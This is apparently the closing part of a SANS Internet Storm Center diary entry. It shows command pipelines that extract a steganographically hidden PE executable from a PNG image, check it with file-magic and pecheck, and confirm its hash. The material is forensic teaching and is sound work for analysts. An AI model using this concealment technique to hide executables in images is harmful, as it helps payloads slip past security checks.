pngdump.py -R -d lake-exe.png   | cut-bytes.py 32:464960l   | format-bytes.py -a -f "bitstream=f:B,b:0,j:>" | headtail.py

This indeed looks like a PE file. Let's do a binary dump and pipe it into the tools file-magic.py and pecheck.py to verify that it is indeed a valid PE file:

pngdump.py -R -d lake-exe.png   | cut-bytes.py 32:464960l   | format-bytes.py -d -f "bitstream=f:B,b:0,j:>" | file-magic.py

pngdump.py -R -d lake-exe.png   | cut-bytes.py 32:464960l   | format-bytes.py -d -f "bitstream=f:B,b:0,j:>" | pecheck.py | headtail.py

We did extract a valid PE file.

And as a final check, since I know the hash of the original file, let's validate it with hash.py:

pngdump.py -R -d lake-exe.png | cut-bytes.py 32:464960l | format-bytes.py -d -f "bitstream=f:B,b:0,j:>" | hash.py -v 0a391054e50a4808553466263c9c3b63e895be02c957dbb957da3ba96670cf34

As Johannes explained in his Stormcast episode, there are many ways to encode data using steganography, and it's often hard to detect/extract unless you know the exact algorithm. I was able to decode it with my tools, because I knew exactly how the PE file was encoded (as I did it myself 🙂 ).

You can find many (online) steganography tools, but they don't always explain how they encode a payload.

If you are interested, tune in this Saturday: I will present you with a challenge diary entry. 🙂

 

Didier Stevens
Senior handler
blog.DidierStevens.com

 

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.